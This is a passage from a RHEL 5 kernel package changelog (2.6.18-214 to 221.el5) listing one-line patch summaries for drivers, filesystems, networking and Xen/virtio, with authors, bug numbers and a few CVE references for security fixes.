is_isa_irq_masked (Paolo Bonzini) [625902]\n- [xen] hvm: fix UP suspend/resume/migration w/PV drivers (Miroslav Rezanina) [629773]\n[2.6.18-221.el5]\n- [acpi] check _PPC state on cpufreq start (Matthew Garrett) [581037]\n- [fs] aio: bump i_count instead of using igrab (Jeff Moyer) [626963]\n- [redhat] dont generate kABI deps when building w/o kABI (Jon Masters) [456765]\n- [watchdog] support for iTCO on Ibex Peak and Cougar Point (John Villalovos) [534152]\n- [edac] amd64_edac: whitespace cleanups (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: minor formatting fix (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: fix operator precedence error (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: fix syndrome calculation on K8 (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: simplify ECC override handling (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: do not falsely trigger kerneloops (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: restrict PCI config space access (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: fix forcing module load/unload (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: fix driver instance freeing (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: fix k8 chip select reporting (Bhavna Sarathy) [568576]\n- [edac] amd64_edac: add leaner syndrome decoding algorithm (Bhavna Sarathy) [568576]\n- [scsi] bnx2i: link hba and cnic device before device reg (Mike Christie) [578005]\n- [scsi] bnx2i: make fw use statsn field to build header (Mike Christie) [578005]\n- [net] cnic: select bug fixes from upstream for RHEL5.6 (Mike Christie) [595548 619767]\n- [scsi] bnx2i: update version to bnx2i-2.1.3 (Mike Christie) [568606]\n- [scsi] bnx2i: add chip cleanup for remove module path (Mike Christie) [568606]\n- [scsi] bnx2i: rebind CFC cleanup to cm_abort/close comp (Mike Christie) [568606]\n- [scsi] bnx2i: add support for additional TMFs (Mike Christie) [568606]\n- [scsi] bnx2i: fix protocol violation on nopout responses (Mike Christie) [568606]\n- [scsi] bnx2i: fix response panic on unsolicited NOP-In (Mike Christie) [568606]\n- [scsi] bnx2i: fix bugs in handling of unsolicited NOP-Ins (Mike Christie) [568606]\n- [scsi] bnx2i: add host param ISCSI_HOST_PARAM_IPADDRESS (Mike Christie) [568606]\n- [scsi] bnx2i: fix TCP graceful termination initiation (Mike Christie) [568606]\n- [scsi] bnx2i: fine tune misc destroy timeout values (Mike Christie) [568606]\n- [scsi] bnx2i: optimize bnx2i_stop connection clean up (Mike Christie) [568606]\n- [scsi] bnx2i: create active linklist holding endpoints (Mike Christie) [568606]\n- [scsi] bnx2i: split hardware cleanup from ep_disconnect (Mike Christie) [568606]\n- [fs] dlm: fix try 1cb failure, part 2 (Abhijith Das) [504188]\n- [fs] dlm: no node callback when try 1cb lock req fails (David Teigland) [504188]\n- [misc] crypto: add Intel x86_64 hardware CRC32 support (Prarit Bhargava) [626018]\n- [net] bnx2: update to v2.0.8+ with new 5709 firmware j15 (John Feeney) [568601]\n- [net] tg3: update to 3.108+ and add 5718 B0, 5719 support (John Feeney) [567462]\n- [misc] move dev_name to device.h (John Feeney) [568551]\n- [misc] add WARN_ONCE macro (John Feeney) [568551]\n- [dma_v3] update I/O AT and DCA drivers (John Feeney) [568551]\n- [net] forcedeth: update to latest upstream for RHEL5.6 (Ivan Vecera) [628831]\n- [net] e1000e: update to upstream version 1.2.7-k2 (Andy Gospodarek) [566021]\n- [net] qla2xxx: fix display of link down state (Chad Dupuis) [627612]\n- [scsi] qla2xxx: rom lock recover if fw hangs holding lock (Chad Dupuis) [619814]\n- [scsi] qla2xxx: update AER support, do early abort cmds (Chad Dupuis) [619814]\n- [scsi] qla2xxx: add IS_QLA82XX check in update_fw_options (Chad Dupuis) [619814]\n- [scsi] qla2xxx: cover UNDERRUN case where SCSI status set (Chad Dupuis) [619814]\n- [scsi] qla2xxx: fix set fw hung and complete waiting mbx (Chad Dupuis) [619814]\n- [scsi] qla2xxx: fix seconds_since_last_heartbeat reset (Chad Dupuis) [619814]\n- [scsi] qla2xxx: correct extended sense-data handling (Chad Dupuis) [619814]\n- [scsi] qla2xxx: dont {s,g}et port MBC if invalid port id (Chad Dupuis) [619814]\n- [scsi] qla2xxx: stop firmware before doing init firmware (Chad Dupuis) [619814]\n- [xen] oprofile: force use of architectural perfmon (Don Dugger) [538564]\n- [xen] oprofile: support Intels arch perfmon registers (Don Dugger) [538564]\n- [xen] oprofile: add support for Core i7 and Atom (Don Dugger) [538564]\n[2.6.18-220.el5]\n- [block] cciss: version string to 3.6.22.RH1 (Tomas Henzl) [568830]\n- [block] cciss: bus_unregister_once not once per hba (Tomas Henzl) [568830]\n- [block] cciss: rename cciss_sector_size (Tomas Henzl) [568830]\n- [block] cciss: make log_unit_to_scsi3addr an inline (Tomas Henzl) [568830]\n- [block] cciss: fix enxio weirdness (Tomas Henzl) [568830]\n- [block] cciss: reorder functions (Tomas Henzl) [568830]\n- [block] cciss: fix raid level sysfs permissions (Tomas Henzl) [568830]\n- [block] cciss: make device attributes static (Tomas Henzl) [568830]\n- [block] cciss: make cciss_seq_show handle drv_array holes (Tomas Henzl) [568830]\n- [block] cciss: add via_ioctl param to rebuild_lun_table (Tomas Henzl) [568830]\n- [block] cciss: add support for multi-lun tape devices (Tomas Henzl) [568830]\n- [block] cciss: notify scsi midlayer of device changes (Tomas Henzl) [568830]\n- [block] cciss: fix scatter-gather on scsi side (Tomas Henzl) [568830]\n- [block] cciss: add more commands for tapes (Tomas Henzl) [568830]\n- [block] cciss: factor out scsi dma code (Tomas Henzl) [568830]\n- [block] cciss: eliminate unnecessary pointer use (Tomas Henzl) [568830]\n- [block] cciss: dont use void pointer for hba (Tomas Henzl) [568830]\n- [block] cciss: detect bad alignment (Tomas Henzl) [568830]\n- [block] cciss: factor out sg chain block mapping code (Tomas Henzl) [568830]\n- [block] cciss: fix DMA direction kludge (Tomas Henzl) [568830]\n- [block] cciss: simplify scatter gather code (Tomas Henzl) [568830]\n- [block] cciss: factor out scatter gather alloc and free (Tomas Henzl) [568830]\n- [block] cciss: enhanced scatter-gather support (Tomas Henzl) [568830]\n- [block] cciss: remove the scan thread (Tomas Henzl) [568830]\n- [block] cciss: fix scsi status typo (Tomas Henzl) [568830]\n- [block] cciss: remove sendcmd (Tomas Henzl) [568830]\n- [block] cciss: clean up code in cciss_shutdown (Tomas Henzl) [568830]\n- [block] cciss: retry driver cmds with unit attention cond (Tomas Henzl) [568830]\n- [block] cciss: no pci_release_regions on regions not held (Tomas Henzl) [568830]\n- [block] cciss: fix memory leak in cciss_init_one (Tomas Henzl) [568830]\n- [block] cciss: dynamically allocate drive info struct (Tomas Henzl) [568830]\n- [block] cciss: fix raid label related magic number (Tomas Henzl) [568830]\n- [block] cciss: no check busy initializing in cciss open (Tomas Henzl) [568830]\n- [block] cciss: add usage_count attribute to logical drive (Tomas Henzl) [568830]\n- [block] cciss: add raid_level attribute to logical drives (Tomas Henzl) [568830]\n- [block] cciss: add lunid attribute to log drives in /sys (Tomas Henzl) [568830]\n- [block] cciss: dont call putdisk excessively (Tomas Henzl) [568830]\n- [block] cciss: zero out drive info on removal (Tomas Henzl) [568830]\n- [block] cciss: handle special case for /dev/cciss/c0d0 (Tomas Henzl) [568830]\n- [block] cciss: handle cases when cciss_add_disk fails (Tomas Henzl) [568830]\n- [block] cciss: fix and rearrange logical drive sysfs code (Tomas Henzl) [568830]\n- [block] cciss: dynamic allocate struct device for logical (Tomas Henzl) [568830]\n- [block] cciss: Use helper functions to access drive_data (Tomas Henzl) [568830]\n- [block] cciss: remove withirq parameter where possible (Tomas Henzl) [568830]\n- [block] cciss: remove sysfs entries during driver cleanup (Tomas Henzl) [568830]\n- [block] cciss: add cciss_sysfs_stat_inquiry function (Tomas Henzl) [568830]\n- [block] cciss: add CTLR_LUNID define (Tomas Henzl) [568830]\n- [block] cciss: Remove unused was_only_controller_node (Tomas Henzl) [568830]\n- [block] cciss: fix problem with LUN addressing (Tomas Henzl) [568830]\n- [block] cciss: fix problem with SG_IO completions (Tomas Henzl) [568830]\n- [block] cciss: retry commands from within sendcmd_withirq (Tomas Henzl) [568830]\n- [block] cciss: change SCSI error handling code (Tomas Henzl) [568830]\n- [block] cciss: remove sendcmd reject processing (Tomas Henzl) [568830]\n- [block] cciss: let scsi error handling work w/interrupts (Tomas Henzl) [568830]\n- [block] cciss: factor out error processing code (Tomas Henzl) [568830]\n- [block] cciss: factor out target status code (Tomas Henzl) [568830]\n- [block] cciss: simplify device addressing methods (Tomas Henzl) [568830]\n- [block] cciss: factor out sendcmd_withirq core (Tomas Henzl) [568830]\n- [block] cciss: use uninterruptible timeout when waiting (Tomas Henzl) [568830]\n- [block] cciss: fix lun reset code (Tomas Henzl) [568830]\n- [block] cciss: factor out sendcmd core for sane interface (Tomas Henzl) [568830]\n- [block] cciss: remove double setting of h->busy (Tomas Henzl) [568830]\n- [block] cciss: disable scan thread, it prevents rmmod (Tomas Henzl) [568830]\n- [net] netxen: fix inconsistent lock state (Chad Dupuis) [562937]\n- [net] netxen: protect tx timeout recovery by rtnl lock (Chad Dupuis) [562937]\n- [net] netxen: fix for kdump (Chad Dupuis) [562937]\n- [net] netxen: fix caching window register (Chad Dupuis) [562937]\n- [net] netxen: fix rcv buffer leak (Chad Dupuis) [562937]\n- [net] netxen: fix memory leaks in error path (Chad Dupuis) [562937]\n- [net] netxen: remove unnecessary returns (Chad Dupuis) [562937]\n- [net] netxen: handle queue manager access (Chad Dupuis) [562937]\n- [net] netxen: to fix onchip memory access. (Chad Dupuis) [562937]\n- [net] netxen: remove unnecessary size checks (Chad Dupuis) [562937]\n- [net] netxen: fix register usage (Chad Dupuis) [562937]\n- [net] netxen: fix deadlock in aer (Chad Dupuis) [562937]\n- [net] netxen: fix interrupt for NX2031 (Chad Dupuis) [562937]\n- [net] netxen: fix fw load from file (Chad Dupuis) [562937]\n- [net] netxen: validate unified romimage (Chad Dupuis) [562937]\n- [net] netxen: fix corner cases of firmware recovery (Chad Dupuis) [562937]\n- [net] netxen: update version to 4.0.73 (Chad Dupuis) [562937]\n- [net] netxen: fix tx csum status (Chad Dupuis) [562937]\n- [net] netxen: added sanity check for pci map (Chad Dupuis) [562937]\n- [net] netxen: fix warning in ioaddr for NX3031 chip (Chad Dupuis) [562937]\n- [net] netxen: fix bios version calculation (Chad Dupuis) [562937]\n- [net] netxen: disable on NX_P3_B1 hardware (Chad Dupuis) [562937]\n- [net] netxen: protect resource cleanup by rtnl lock (Chad Dupuis) [562937]\n- [net] netxen: fix tx timeout recovery for NX2031 chip (Chad Dupuis) [562937]\n- [net] netxen: fix sparse warning (Chad Dupuis) [562937]\n- [net] netxen: fix license header (Chad Dupuis) [562937]\n- [net] netxen: fix endianness intr coalesce (Chad Dupuis) [562937]\n- [net] netxen: fix endianness read mac address (Chad Dupuis) [562937]\n- [net] netxen: use DEFINE_PCI_DEVICE_TABLE() (Chad Dupuis) [562937]\n- [net] netxen: update version to 4.0.72 (Chad Dupuis) [562937]\n- [net] netxen: fix set mac addr (Chad Dupuis) [562937]\n- [net] netxen: fix smatch warning (Chad Dupuis) [562937]\n- [net] netxen: fix tx ring memory leak (Chad Dupuis) [562937]\n- [net] netxen: fix ethtool link test (Chad Dupuis) [562937]\n- [net] netxen: move && and || to end of previous line (Chad Dupuis) [562937]\n- [net] netxen: fix ethtool register dump (Chad Dupuis) [562937]\n- [net] netxen: fix unified fw size check (Chad Dupuis) [562937]\n- [net] netxen: support pci error handlers (Chad Dupuis) [562937]\n- [net] netxen: fix tx timeout recovery (Chad Dupuis) [562937]\n- [net] netxen: minor suspend resume fixes (Chad Dupuis) [562937]\n- [net] netxen: use module parameter correctly (Chad Dupuis) [562937]\n- [net] netxen: fix firmware type check (Chad Dupuis) [562937]\n- [net] netxen: fix napi intr enable check (Chad Dupuis) [562937]\n- [net] netxen: protect device reset by rtnl_lock (Chad Dupuis) [562937]\n- [net] netxen: fix failure cases for fw hang recovery (Chad Dupuis) [562937]\n- [net] netxen: fix debug tools access for NX2031 (Chad Dupuis) [562937]\n- [misc] clone: fix race between copy_process and de_thread (Jiri Olsa) [590864]\n- [s390] dasd: let recovery cqr get flags from failed cqr (Hendrik Brueckner) [628838]\n- [net] ipv4: fix leak, rcu and length in route cache gc (Thomas Graf) [541224]\n- [net] tcp: zero out rx_opt in tcp_disconnect (Thomas Graf) [539560]\n- [net] ipv6: Update Neighbor Cache when IPv6 RA received (Thomas Graf) [560870]\n- [net] ipv6: Plug sk_buff leak in ipv6_rcv (Thomas Graf) [574913]\n- [redhat] configs: enable building k10temp sensor driver (Michal Schmidt) [443745]\n- [hwmon] add k10temp sensor driver (Michal Schmidt) [443745]\n- [pci] add AMD 10h, 11h PCI IDs to pci_ids.h (Michal Schmidt) [443745]\n- [net] vxge: fix multicast issues (Michal Schmidt) [608598]\n- [net] vxge: show startup message with KERN_INFO (Michal Schmidt) [608598]\n- [net] vxge: fix memory leak in vxge_alloc_msix error path (Michal Schmidt) [608598]\n- [net] vxge: fix checkstack warning in vxge_probe (Michal Schmidt) [608598]\n- [net] vxge: remove unnecessary returns from void functs (Michal Schmidt) [608598]\n- [net] vxge: version update (Michal Schmidt) [608598]\n- [net] vxge: pass correct number of VFs value to sriov (Michal Schmidt) [608598]\n- [net] vxge: allow load for all enumerated pci functions (Michal Schmidt) [608598]\n- [net] vxge: fix possible memory leak in device init (Michal Schmidt) [608598]\n- [net] vxge: add missing vlan_rx_kill_vid method (Michal Schmidt) [594404 608598]\n- [net] vxge: remove trailing space in messages (Michal Schmidt) [608598]\n- [net] vxge: use pci_dma_mapping_error to test return val (Michal Schmidt) [608598]\n- [net] vxge: use DEFINE_PCI_DEVICE_TABLE (Michal Schmidt) [608598]\n- [net] vxge: use DMA_BIT_MASK instead of plain values (Michal Schmidt) [608598]\n- [net] vxge: move && and || to end of previous line (Michal Schmidt) [608598]\n- [net] bnx2x: fix wrong return from bnx2x_trylock_hw_lock (Michal Schmidt) [572012]\n- [net] bnx2x: small fix in stats handling (Michal Schmidt) [572012]\n- [net] bnx2x: update bnx2x version to 1.52.53-4 (Michal Schmidt) [572012]\n- [net] bnx2x: fix PHY locking problem (Michal Schmidt) [572012]\n- [net] bnx2x: adjust confusing if indentation (Michal Schmidt) [572012]\n- [net] bnx2x: load firmware in open instead of probe (Michal Schmidt) [572012]\n- [net] bnx2x: fix net/ip6_checksum.h include (Michal Schmidt) [572012]\n- [net] bnx2x: update driver version to 1.52.53-3 (Michal Schmidt) [572012]\n- [net] bnx2x: move statistics handling code to own files (Michal Schmidt) [572012]\n- [net] bnx2x: create separate file for ethtool routines (Michal Schmidt) [572012]\n- [net] bnx2x: create bnx2x_cmn.* files (Michal Schmidt) [572012]\n- [net] bnx2x: main netdev does not need ->poll, ->weight (Michal Schmidt) [572012]\n- [net] bnx2x: move global variable load_count to bnx2x.h (Michal Schmidt) [572012]\n- [net] bnx2x: store module parameters in main structure (Michal Schmidt) [572012]\n- [net] bnx2x: create separate folder for bnx2x driver (Michal Schmidt) [572012]\n- [net] bnx2x: set RXHASH for LRO packets (Michal Schmidt) [572012]\n- [net] bnx2x: return -EINVAL for unsupported flags (Michal Schmidt) [572012]\n- [net] bnx2x: fail when trying to setup unsupported features (Michal Schmidt) [572012]\n- [net] bnx2x: fix link problem with some DACs (Michal Schmidt) [572012]\n- [net] bnx2x: protect a SM state change (Michal Schmidt) [572012]\n- [net] bnx2x: avoid TX timeout when stopping device (Michal Schmidt) [572012]\n- [net] bnx2x: fix check to get RX hash (Michal Schmidt) [572012]\n- [net] bnx2x: remove two unneeded prefetch calls (Michal Schmidt) [572012]\n- [net] bnx2x: add support for receive hashing (Michal Schmidt) [572012]\n- [net] bnx2x: update date and version to 1.52.53-1 (Michal Schmidt) [572012]\n- [net] bnx2x: dont report link down if already down (Michal Schmidt) [572012]\n- [net] bnx2x: rework power state handling code (Michal Schmidt) [572012]\n- [net] bnx2x: use register mask to avoid parity error (Michal Schmidt) [572012]\n- [net] bnx2x: fix MSI-X enabling flow (Michal Schmidt) [572012]\n- [net] bnx2x: add new statistics (Michal Schmidt) [572012]\n- [net] bnx2x: white space and formatting fixups (Michal Schmidt) [572012]\n- [net] bnx2x: protect code with NOMCP (Michal Schmidt) [572012]\n- [net] bnx2x: increase DMAE max write size for 57711 (Michal Schmidt) [572012]\n- [net] bnx2x: add skeleton VPD firmware version read code (Michal Schmidt) [572012]\n- [net] bnx2x: parity error handling for 57710 and 57711 (Michal Schmidt) [572012]\n- [net] bnx2x: use DEFINE_PCI_DEVICE_TABLE() (Michal Schmidt) [572012]\n- [net] bnx2x: move && and || to end of previous line (Michal Schmidt) [572012]\n- [net] bnx2x: remove trailing space in messages (Michal Schmidt) [572012]\n- [net] bnx2x: clean up debug prints (Michal Schmidt) [572012]\n- [net] bnx2x: use macro for phy address (Michal Schmidt) [572012]\n- [net] bnx2x: convert more to %pM (Michal Schmidt) [572012]\n- [net] bnx2x: use pci_ioremap_bar (Michal Schmidt) [572012]\n- [net] bnx2x: make NAPI poll routine closer to upstream (Michal Schmidt) [572012]\n- [net] bnx2x: typo fixes (Michal Schmidt) [572012]\nmacro helpers (Michal Schmidt) [572012]\n- [net] bnx2x: use DMA_BIT_MASK(64) over DMA_64BIT_MASK (Michal Schmidt) [572012]\n- [net] sfc: update to upstream version 2.6.36-rc1 code (Michal Schmidt) [556476]\n- [net] sfc: undo now unnecessary RHEL workqueue changes (Michal Schmidt) [556476]\n- [net] netdevice: add netdev_for_each_mc_addr (Michal Schmidt) [556476]\n- [misc] add round_jiffies_up and related routines (Michal Schmidt) [556476]\n- [net] core: bug fix for vlan + gro issue (Michal Schmidt) [556476]\n- [net] vlan/bridge: fix skb_pull_rcsum fatal exception (Michal Schmidt) [556476]\n- [fs] proc: add file position and flags info in /proc (Jerome Marchand) [498081]\n- [net] e100*/igb*/ixgb*: add missing read memory barrier (Andy Gospodarek) [629761]\n- [net] igb/igbvf: turn on TSO for VLAN interfaces (Andy Gospodarek) [629457]\n- [net] vlan: control vlan device TSO status with ethtool (Andy Gospodarek) [629457]\n- [xen] vtd: fix parameter iommu=no-intremap (Paolo Bonzini) [576478]\n[2.6.18-219.el5]\n- [net] udp: fix bogus UFO packet generation (Jarod Wilson) [632266]\n- [virt] xen: fix xennet driver to not corrupt data (Neil Horman) [630129]\n- [virt] fix 64-bit compile issue in VMWare TSC update (Prarit Bhargava) [538022]\n[2.6.18-218.el5]\n- [net] tcp: prevent sending past receiver window with TSO (Thomas Graf) [494400]\n- [misc] netdevice: add printk helpers for net drivers (Michal Schmidt) [629634]\n- [misc] drivers: remove private definitions of pr_* macros (Michal Schmidt) [629634]\n- [misc] kernel: add pr_* family of printk helper macros (Michal Schmidt) [629634]\n- [infiniband] iw_cxgb3: always define states[] (Michal Schmidt) [629634]\n- [net] ifb: fix syntax error in pr_debug usage (Michal Schmidt) [629634]\n- [net] tg3: disable PME bit during resume (John Feeney) [598530]\n- [net] netfilter: fix crashes caused by fragment jumps (Jiri Pirko) [617268]\n- [virt] update VMWare TSC code (Prarit Bhargava) [538022]\n[2.6.18-217.el5]\n- [time] implement fine grained accounting for PM timer (Ulrich Obergfell) [586285]\n- [time] initialize tick_nsec based on kernel parameters (Ulrich Obergfell) [586285]\n- [time] introduce 'pmtimer_fine_grained' kernel parameter (Ulrich Obergfell) [586285]\n- [scsi] ibmvfc: Fix terminate_rport_io (Steve Best) [628615]\n- [fs] ext3: flush disk caches on fsync when needed (Eric Sandeen) [592961]\n- [fs] ext4: move aio completion after unwritten extent con (Eric Sandeen) [617690]\n- [fs] xfs: move aio completion after unwritten extent conv (Eric Sandeen) [617690]\n- [fs] direct-io: move aio_complete into ->end_io (Eric Sandeen) [617690]\n- [fs] ext4: quota updates for RHEL5.6 (Eric Sandeen) [457153]\n- [fs] ext4: quota infrastructure updates for RHEL5.6 (Eric Sandeen) [457153]\n- [fs] ext4: core updates for RHEL5.6 (Eric Sandeen) [457153]\n- [fs] ext4: add new kernel helpers for RHEL5.6 (Eric Sandeen) [457153]\n- [infiniband] sync iser driver with upstream for RHEL5.6 (Mike Christie) [623595]\n- [net] cxgb3: dont flush workqueue if called from wq (Doug Ledford) [630124]\n- [net] cxgb3: get fatal parity error status on interrupt (Doug Ledford) [630124]\n- [net] cxgb3: clear fatal parity error register on init (Doug Ledford) [630124]\n- [net] cxgb3: add define for fatal parity error bit (Doug Ledford) [630124]\n- [net] qlge: update driver version to 1.00.00.25 (Chad Dupuis) [567402]\n- [net] qlge: fix a eeh handler to not add a pending timer (Chad Dupuis) [567402]\n- [net] qlge: update driver version to 1.00.00.24 (Chad Dupuis) [567402]\n- [net] qlge: remove error pkt flags, enable net csum error (Chad Dupuis) [567402]\n- [net] qlge: restore promiscuous setting in ql_adapter_up (Chad Dupuis) [567402]\n- [net] qlge: change cpu_to_be16 to htons for udp checksum (Chad Dupuis) [567402]\n- [net] qlge: remove firmware dependency for MPI coredump (Chad Dupuis) [567402]\n- [net] qlge: adding ndev->last_rx = jiffies (Chad Dupuis) [567402]\n- [net] qlge: fix pktgen issue reported by Cisco (Chad Dupuis) [567402]\n- [virtio] fix balloon without VIRTIO_BALLOON_F_STATS_VQ (Amit Shah) [601692]\n- [virtio] fix sched while atomic in virtio_balloon stats (Amit Shah) [601692]\n- [virtio] add memory stat reporting to balloon driver (Amit Shah) [601692]\n[2.6.18-216.el5]\n- [net] hashlimit: check allocation before freeing memory (Wade Mealing) [615229]\n- [net] clusterip: check allocation before freeing memory (Wade Mealing) [615227]\n- [ia64] mca: save I-resources when INIT is sent (Takao Indoh) [471136]\n- [scsi] mpt2sas: update to 05.101.00.02 (Tomas Henzl) [568281]\n- [scsi] ipr: bump the version number and date (Steve Best) [626566]\n- [scsi] ipr: fix resource type update and add attributes (Steve Best) [626566]\n- [scsi] ipr: fix transition to operational on new adapters (Steve Best) [626566]\n- [scsi] ipr: change endian swap key for hw spec change (Steve Best) [626566]\n- [scsi] ipr: add support for Obsidian-E embedded adapter (Steve Best) [626566]\n- [scsi] ipr: add MMIO write for BIST on 64-bit adapters (Steve Best) [626566]\n- [scsi] ipr: move setting of allow_restart flag (Steve Best) [626566]\n- [scsi] ipr: add writeq definition if needed (Steve Best) [626566]\n- [scsi] ipr: add endian swap enable for 64-bit adapters (Steve Best) [626566]\n- [scsi] ipr: fix resource path display and formatting (Steve Best) [626566]\n- [scsi] ipr: improve interrupt service routine performance (Steve Best) [626566]\n- [scsi] ipr: set data list length in request control block (Steve Best) [626566]\n- [scsi] ipr: fix register read address on 64-bit adapters (Steve Best) [626566]\n- [scsi] ipr: add resource path to IOA status area struct (Steve Best) [626566]\n- [scsi] ipr: implement fixes for 64-bit adapter support (Steve Best) [626566]\n- [scsi] ipr: fix compile warning (Steve Best) [626566]\n- [fs] ext4: allocate ->s_blockgroup_lock separately (Eric Sandeen) [614957]\n- [pci] xen: disable broken msi/msix on ia64 xen (Radim Krcmar) [518463]\n- [misc] fix non-CONFIG_NUMA x86_64 compile (Prarit Bhargava) [583673]\n- [pnp] ignore both UNSET and DISABLED ioresources (Prarit Bhargava) [560540]\n- [pnp] reserve system board iomem and ioport resources (Prarit Bhargava) [560540]\n- [net] ipv4: add IP_NODEFRAG option for IPv4 socket (Jiri Olsa) [562220]\n- [nfs] sunrpc: cancel task_cleanup work in xprt_destroy (Jeff Layton) [611938]\n- [fs] nfs: fix file create failure with HPUX client (Jeff Layton) [605720]\n- [net] ixgbe: update to upstream version 2.0.84-k2 (Andy Gospodarek) [568602]\n- [net] vlan: add VLAN bitfield defines (Andy Gospodarek) [566027]\n- [net] igb: actually support self_test ethtool command (Andy Gospodarek) [593862]\n- [net] ixgbe: actually support self_test ethtool command (Andy Gospodarek) [593862]\n- [net] ixgbevf: update to version 1.0.0-k1 (Andy Gospodarek) [566027]\n- [net] bonding: fix ALB mode to balance traffic on VLANs (Andy Gospodarek) [578531]\n- [net] igb: do register dump just before resetting adapter (Andy Gospodarek) [568602]\n- [kernel] nmi_watchdog: output count during check on boot (Don Zickus) [613667]\n- [misc] nmi: fix bogus nmi watchdog stuck messages (Don Zickus) [455323]\n- [virt] nmi: dont print NMI stuck messages on guests (Don Zickus) [455323]\n- [misc] nmi_watchdog: add /proc/sys/kernel/nmi_watchdog (Don Zickus) [455323]\n- [misc] scripts: use system python instead of env (Don Zickus) [521878]\n- [pci] sr-iov: fix broken resource alignment calculations (Don Dutile) [523341]\n- [pci] clean up resource alignment management (Don Dutile) [523341]\n- [pci] sr-iov: assign pci resources earlier (Don Dutile) [523341]\n- [net] vxge: update version to reflect RHEL5.6 changes (Bob Picco) [580413]\n- [net] vxge: set func_id 0 as privileged for normal func (Bob Picco) [580413]\n- [net] vxge: fix MSIX interrupt configuration (Bob Picco) [580413]\n- [net] vxge: fix ethtool -d output (Bob Picco) [580413]\n- [net] vxge: align tmemory only if misaligned (Bob Picco) [580413]\n- [net] vxge: fix hw buffer starvation from short packets (Bob Picco) [580413]\n- [net] vxge: fix receive stall w/ driver/chip out-of-sync (Bob Picco) [580413]\n- [cpufreq] add APERF/MPERF support for AMD processors (Bhavna Sarathy) [621335]\n- [xen] vmx: fix handling of FS/GS base MSRs (Michal Novotny) [613187]\n- [xen] hv: improve backtrace support on ia64 (Andrew Jones) [499553]\n- [xen] support new AMD family 0x15 CPU and NB hardware (Bhavna Sarathy) [619092]\n- [xen] allow dom0 to control core performance boost (Bhavna Sarathy) [568771]\n- [xen] add support for dom0 to access APERF/MPERF for AMD (Bhavna Sarathy) [568772]\n[2.6.18-215.el5]\n- [sound] ALSA HDA driver update for RHEL5.6 (Jaroslav Kysela) [592199]\n- [net] igbvf: update to latest upstream for RHEL5.6 (Stefan Assmann) [566028]\n- [net] igb: update igb driver to support Portville ACS (Stefan Assmann) [566024]\n- [net] igb: fix error in igb AER code (Stefan Assmann) [612212]\n- [ata] libata: fix suspend/resume for ATA SEMB devices (David Milburn) [622559]\n- [ata] sata_mv: msi masking fix (David Milburn) [554872]\n- [ata] sata_mv: Properly initialize main irq mask (David Milburn) [554872]\n- [ata] sata_mv: remove bogus nsect restriction (David Milburn) [554872]\n- [ata] sata_mv: dont read hc_irq_cause (David Milburn) [554872]\n- [ata] sata_mv: add the Gen IIE flag to the SoC devices (David Milburn) [554872]\n- [ata] sata_mv: dont issue two DMA commands concurrently (David Milburn) [554872]\n- [ata] sata_mv: safer logic for limit warnings (David Milburn) [554872]\n- [ata] sata_mv: warn on PIO with multiple DRQs (David Milburn) [554872]\n- [ata] sata_mv: enable async_notify for 60x1 Rev.C0 and up (David Milburn) [554872]\n- [s390] zfcp: Do not print bit mask as link speed (Hendrik Brueckner) [619857]\n- [s390] dasd: force online does not work (Hendrik Brueckner) [619466]\n- [s390] dasd: allocate fallback cqr for reserve/release (Hendrik Brueckner) [619465]\n- [s390] qeth: wait for finished recovery (Hendrik Brueckner) [619456]\n- [s390] qeth: avoid loop if ipa command response missing (Hendrik Brueckner) [619451]\n- [s390] zfcp: no force close when port is already closed (Hendrik Brueckner) [612263]\n- [s390] zfcp: Do not unblock rport from REOPEN_PORT_FORCED (Hendrik Brueckner) [612266]\n- [s390] zfcp: Fail erp after timeout (Hendrik Brueckner) [612261]\n- [message] fusion: update to 3.4.15 (Tomas Henzl) [568292]\n- [net] ipv6: reroute packets after netfilter mangling (Thomas Graf) [517327]\n- [scsi] lpfc: update driver from 8.2.0.76.1p to 8.2.0.77 (Rob Evers) [603806]\n- [virt] xenbus: avoid deadlock unregistering xenbus watch (Paolo Bonzini) [429102]\n- [ia64] kdump: prevent hang on INIT interrupt during boot (Neil Horman) [506694]\n- [net] qla3xxx: fix oops on too-long netdev priv structure (Neil Horman) [620508]\n- [kprobes] kretprobe: set status to fix fault handling (Josh Stone) [615121]\n- [net] bonding: fix a race in calls to slave MII ioctls (Flavio Leitner) [621280]\n- [virt] xen-kernel: improve backtrace support on ia64 (Andrew Jones) [499553]\n- [acpi] thinkpad-acpi: lock down video output state access (Don Howard) [607037]\n- [fs] xfs: fix untrusted inode number lookup (Dave Chinner) [624862]\n[2.6.18-214.el5]\n- [mm] accept an abutting stack segment (Jiri Pirko) [607858] {CVE-2010-2240}\n- [fs] fix dcache accounting bug (Josef Bacik) [596548]\n- [scsi] mptsas: enable TLR for SSP TAPE drives (Tomas Henzl) [599420]\n- [scsi] sas: add transport layer retry support (Tomas Henzl) [599420]\n- [scsi] fix potential kmalloc failure in scsi_get_vpd_page (Tomas Henzl) [599420]\n- [scsi] fix bugs in scsi_vpd_inquiry (Tomas Henzl) [599420]\n- [scsi] add VPD helper (Tomas Henzl) [599420]\n- [x86_64] implement vDSO randomization (Danny Feng) [459763]\n- [virt] xen: dont adjust time for ntp clock slowing (Bretislav Kabele) [553407]\n- [net] ibmveth: fix lost IRQ that leads to service loss (Steve Best) [626841]\n- [scsi] cxgb3i: sync driver with upstream for RHEL5.6 (Mike Christie) [567444]\n- [net] sched: fix some kernel memory leaks (Jiri Pirko) [624638] {CVE-2010-2942}\n- [tpm] autoload tpm_tis driver (John Feeney) [530123]\n- [usb] fix usbfs information leak (Eugene Teo) [566629] {CVE-2010-1083}\n- [virtio] console: Backport driver for RHEL 5.6 (Amit Shah) [620037]\n- [virtio] add virtqueue_ vq_ops wrappers (Amit Shah) [620037]\n- [virtio] initialize vq->data entries to NULL (Amit Shah) [620037]\n- [virtio] add ability to detach unused buffers from vrings (Amit Shah) [620037]\n- [virtio] make add_buf return capacity remaining (Amit Shah) [620037]\n- [virtio] find_vqs/del_vqs virtio operations (Amit Shah) [620037]\n- [virtio] add names to virtqueue struct (Amit Shah) [620037]\n- [virtio] more neatening of virtio_ring macros (Amit Shah) [620037]\n- [virtio] fix BAD_RING, START_US and END_USE macros 